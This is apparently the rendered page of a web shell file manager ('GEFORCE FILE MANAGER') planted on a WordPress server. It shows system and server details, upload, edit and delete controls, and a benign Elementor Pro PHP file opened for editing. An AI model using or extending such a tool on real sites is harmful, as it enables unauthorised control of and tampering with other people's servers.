[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
atomic-widgets
/
transformers
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 condition-group.php
604 B
SET
[ EDIT ]
|
[ DEL ]
📄 display-conditions.php
1,373 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: condition-group.php
<?php namespace ElementorPro\Modules\AtomicWidgets\Transformers; use Elementor\Modules\AtomicWidgets\PropsResolver\Props_Resolver_Context; use Elementor\Modules\AtomicWidgets\PropsResolver\Transformer_Base; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Condition_Group extends Transformer_Base { public function transform( $conditions, Props_Resolver_Context $context ) { if ( ! is_array( $conditions ) || empty( $conditions ) ) { return null; } return array_map( function( $condition ) { return json_decode( $condition, true ); }, $conditions ); } }